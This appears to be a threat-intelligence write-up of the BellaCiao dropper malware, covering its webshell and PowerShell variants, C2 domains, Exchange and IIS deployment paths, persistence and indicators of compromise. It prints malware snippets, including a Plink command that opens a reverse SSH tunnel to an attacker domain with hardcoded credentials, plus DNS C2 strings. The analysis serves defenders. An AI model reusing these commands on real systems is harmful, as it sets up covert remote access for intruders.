Skip to main content

Introduction to BellaCiao

BellaCiao is a .NET-based dropper malware developed and deployed by IRGC-IO Counterintelligence Division (Unit 1500) Department 40. The malware has been analyzed by BitDefender and exists in two distinct variants, each with different capabilities and deployment strategies.
The complete source code for both variants has been exposed in Episode 3, providing unprecedented insight into CharmingKitten’s malware development practices.

Technical Overview

BellaCiao operates as a dropper that deploys additional malicious components onto compromised systems. The malware is designed to:
  • Establish persistent access to victim systems
  • Deploy webshells for remote command execution
  • Enable file upload and download capabilities
  • Establish reverse proxy connections using legitimate tools

Variant 1: C# Webshell Dropper

Architecture

The first variant of BellaCiao drops a C# webshell that provides comprehensive remote access capabilities: Key Features:
  • File upload and download
  • Command execution via webshell interface
  • Stealth deployment to IIS and Exchange Server paths
  • DNS-based command and control using randomized subdomains

Command & Control Infrastructure

The malware uses DNS queries with randomized subdomains for C2 communication: 
string dnsdomain = ".At.twittsupport.com";
string dnsdomain2 = ".At.mailupdate.info";
string finalhost = randstr + "EX2016" + dnsdomain;
Domains Used:
  • twittsupport.com
  • mailupdate.info

Deployment Locations

The webshell is strategically deployed to multiple locations to ensure persistence: IIS Locations:
  • c:\inetpub\wwwroot\aspnet_client\
  • c:\inetpub\wwwroot\aspnet_client\system_web\
Exchange Server Locations:
  • C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\
  • C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\
  • C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\

Webshell Capabilities

The embedded C# webshell supports:
  1. Command Execution - Executes system commands and returns output
  2. File Upload - Uploads files to specified paths on the victim system
  3. File Download - Downloads files from the victim system
  4. Custom Encoding - Uses character substitution for command obfuscation

Real-World Attack: Turkish Foreign Ministry

The source code includes evidence of a successful attack against the Turkish Foreign Ministry: Target: 212.175.168.58
Webshell URL: https://eposta.mfa.gov.ct.tr/aspnet_client/system_web/aspnet_client.aspx Commands Executed:
  • Lateral movement via WMI to internal systems (10.20.x.x network)
  • Credential usage: Admin1@MFA with password
  • Deployment of Plink for reverse tunneling
  • Access to Exchange mailbox servers

Variant 2: PowerShell Reverse Proxy

Architecture

The second variant deploys a PowerShell-based webserver combined with Plink (PuTTY Link) for reverse proxy capabilities. Components:
  • iis.ps1 - PowerShell webserver script (734 lines)
  • Java Update Services.exe - Plink binary for SSH tunneling
  • Configuration file with C2 parameters

PowerShell Webserver

Based on a customized version of a publicly available PowerShell webserver (venom/Start-Webserver.ps1), the script provides: Features:
  • HTTP listener on 127.0.0.1:49450
  • Command execution interface
  • Script upload and execution
  • File upload and download
  • Web-based file browser
Supported Operations: 
/          - Command execution
/script    - Execute uploaded PowerShell scripts
/download  - Download files from victim
/upload    - Upload files to victim
/log       - View webserver logs
The malware establishes a reverse SSH tunnel using Plink: 
$domain = "twittsupport.com"
$domain2 = "msn-center.uk"
$Path = "C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe"
$command = "echo Y | $Path $domain -P 443 -C -R 127.0.0.1:9090:127.0.0.1:49450 -l Israel -pw Israel@123!"
Tunnel Configuration:
  • Remote Port: 9090 on attacker server
  • Local Port: 49450 (PowerShell webserver)
  • Protocol: SSH over port 443 (HTTPS)
  • Credentials: Israel / Israel@123!

Persistence Mechanism

The malware installs itself as a Windows service:
  • Service Name: “Java Update Services”
  • Binary Location: C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe
  • Script Location: C:\ProgramData\Microsoft\Diagnostic\JavaUpdateServices.ps1
  • Alive Time: 24 hours
  • Port: 8000

Dual-Domain Fallback

Both C2 domains are attempted with automatic fallback:
  1. Primary: twittsupport.com
  2. Fallback: msn-center.uk
If the primary domain fails, the malware waits 10 seconds and attempts the backup domain.

Anti-Detection Features

Obfuscation Techniques

  1. Base64 Encoding - Webshell payload stored as base64 with noise characters
  2. Character Replacement - Uses # and @ as noise in encoded payload
  3. Random Naming - Generates random filenames for deployed webshells
  4. Timer-Based Execution - 120-hour intervals between DNS queries

Stealth Deployment

  • Deploys to legitimate Microsoft paths (Exchange, IIS)
  • Uses service names mimicking legitimate software
  • Hidden file execution for service binaries
  • Minimal network traffic pattern (timer-based callbacks)

C2 Communication Protocol

The malware uses DNS TXT records and IP address responses for command encoding: IP Address Decoding: 
X.Y.Z.110 → Deploy webshell
X.Y.81.Z  → Target Exchange Server paths
X.Y.Z.Z   → Target IIS paths  
213.47.81.107 → Remove webshell

Indicators of Compromise

Domains

  • twittsupport.com
  • mailupdate.info
  • msn-center.uk

File Paths

C:\inetpub\wwwroot\aspnet_client\aspnet.aspx
C:\inetpub\wwwroot\aspnet_client\system_web\aspnet_client.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\owafont.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\themes.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\logon.aspx
C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe
C:\ProgramData\Microsoft\Diagnostic\JavaUpdateServices.ps1

Service Names

  • “Microsoft Exchange Agent Diagnostic Services”
  • “Microsoft Monitoring Exchange Services”
  • “Exchange Agent Diagnostic Services”
  • “Java Update Services”

Attribution Evidence

The source code release directly links BellaCiao to IRGC-IO operations:
  • Consistent infrastructure with other CharmingKitten tools
  • Shared C2 domains across multiple campaigns
  • Code comments and variables in Persian
  • Targeting patterns aligned with Iranian intelligence priorities
Organizations running Exchange Server or IIS should check the file paths listed above for unauthorized .aspx files and investigate any services with names similar to those listed.

Build docs developers (and LLMs) love

Get started for freeTalk to us